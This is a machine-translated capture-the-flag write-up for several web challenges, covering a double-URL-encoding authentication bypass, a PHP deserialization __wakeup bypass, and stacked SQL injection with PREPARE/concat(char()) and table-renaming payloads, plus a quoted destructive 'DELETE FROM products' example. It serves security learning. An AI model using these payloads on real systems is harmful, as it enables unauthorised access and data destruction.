CTF_ Web: Advanced questions of attack and defense world expert zone WP (9-14)

Continuous updating ing

0x09 PHP2

There is only one sentence in the title ,Can you anthenticate to this website?, In fact, to tell the truth, there is no idea , according to dirsearch Result , Only index.php There is , There is nothing in it , All the elders said index.phps Source code disclosure , So he looked .

<?php
if("admin"===$_GET[id]) {
  echo("<p>not allowed!</p>");
  exit();
}

$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "admin")
{
  echo "<p>Access granted!</p>";
  echo "<p>Key: xxxxxxx </p>";
}
?>

Can you anthenticate to this website?

The above code is the condition to verify whether it passes , Simply put, it's incoming id Value is not equal to admin, But in url Decoded equal to admin,a by %61, Pass in %61dmin, The discovery is directly decoded by the browser admin, Affect the subsequent judgment , So for % Re code , Pass in %2561dmin. obtain flag.

0x10 unserialize3

Open with the title ：

class xctf{ 
	public $flag = '111';
	public function __wakeup(){
	exit('bad requests');
}
?code=

Incoming code Just jump out of the magic function __wakeup that will do ,wakeup The function will skip execution when the number of deserialized objects is different from the actual number of parameters , That is, there is only one parameter in the current function $flag, If the number of parameters in the incoming serialization string is 2 You can bypass .
Write the following code :

<?php
class xctf{ 
	public $flag = '111';
}
$a = new xctf();
echo serialize($a);

Get the results O:4:"xctf":1:{s:4:"flag";s:3:"111";}, Will class xctf Parameters in 1 It is amended as follows 2, Submit code, obtain flag.
Later, we will learn about deserialization , First, I will brush the questions .

0x11 upload1

Failed to create environment .
The title is a js Upload of front-end verification , Capture packets, modify submission parameters or modify the front end js Verification can be bypassed .

0x12 Web_python_template_injection

Failed to create environment .
The title is a python Template Injection （SSTI） The problem of , It will be right later SSTI Make a detailed analysis , Also accumulate some knowledge .

0x13 Web_php_unserialize

Failed to create environment .
According to the title, it can be seen that it is a deserialization vulnerability , This part will be supplemented later , Accumulate basic knowledge .

0x14 supersqli（easysql）

The title comes from the strong net cup 2019 Of easysql, It is an injection question . Let's look at the title first ：

adopt 1’ Report errors , Make sure there is sql Inject .

adopt order by Determine the number of fields as 2.

In the use of union It is found that most of the keywords are disabled during the joint query .

In fact, I don't have any good ideas here , Use deformation to bypass select Also failed , Keep reporting errors , Online seniors have talked about the need to use Stack Injection 了 , What is the difference between joint query and stack injection ？
The following quote is from SQL Inject - Stack Injection （ Heap query injection ）, Thank you for your summary .

• stay SQL in , A semicolon （;） It's used to express a sql The end of the statement . Imagine that we are ; End one sql Continue to construct the next statement after the statement , Will it be executed together ？ So this idea creates Stack Injection .
• and union injection（ Joint injection ） It is also a combination of two statements , Is there any difference between the two ？ The difference is that union perhaps union all The types of statements executed are limited , It can be used to execute Query statement , What stack injection can do is Arbitrary statements .
• For example, here is an example . User input ：1; DELETE FROM products Server generated sql Statement for ：（ Because the input parameters are not filtered ）Select * from products where productid=1;DELETE FROM products When the query is executed , The first item shows the query information , Second, delete the whole table .
• The limitation of stack injection is that it can't be executed in every environment , May be affected by API Or restrictions not supported by the database engine ,（ That is to say, sometimes it is not suitable for , That suits union Is it suitable for stacking ？） Of course, insufficient permissions can also explain why attackers cannot modify data or call some programs .

Since the stack can be executed with any statement , First, learn some common statements in the library .

show databases; Show database list .
show tables; Displays the table of the current query .
desc words; Get table structure .
show columns from words; Get table structure .
alter table t1 rename t2; Rename table name .
alter table words change  Field name   new field name  varchar(100) type ; Heavy name segment name .

Check all table names , Only found 1919810931114514 and words surface .

see words surface structure .

see 1919810931114514 Table structure .

According to the structure of the query data , Now we use words surface , and flag stay 1919810931114514 In the table .

array(2) {
  [0]=>
  string(1) "1"
  [1]=>
  string(7) "hahahah"
}

In fact, the train of thought here is quite bright , Is to look up the table flag Value of field , however select And other keywords are disabled , Various predecessors have also provided different ideas to solve .

• One is Lee-404  Shifu ordered SQL Inquire about .

PREPARE name from '[my sql sequece]';   // predefined SQL sentence 
EXECUTE name;  // Execute predefined SQL sentence 
(DEALLOCATE || DROP) PREPARE name;  // Delete predefined SQL sentence 
char()
cancat() // Connecting characters 
char(115,101,108,101,99,116) -->SELECT

Last payload by 1';PREPARE name from concat(char(115,101,108,101,99,116),'* from `1919810931114514`');EXECUTE name;#（ The table name of pure numbers should be added Reverse citation ` Number ）

• Two is Art_Dillon Master modifies the default query table .
  The pre knowledge is to modify the table 、 Name .

rename tables words to words1; Modify the name of the table .
alter table words change flag id varchar(100); Modify the column names in the table .

Final payload by 1 ' or 1=1; rename tables words to words1;rename tables `1919810931114514` to words;alter table words change flag id varchar(100);# After successful execution , Need to... Again 1' or 1=1;# Query all column information .

Summary

After the practice of the topic in recent days, I found that I lacked a lot of knowledge , It is also the hope that through the practice of the topic to find their own shortcomings , List the contents , Learn one by one , The next step is to do the weak types mentioned above md5 Collision 、php Fake protocol 、 Deserialization 、 Template Injection （SSTI） And so on .
Fill in the basic learning and continue to brush the questions .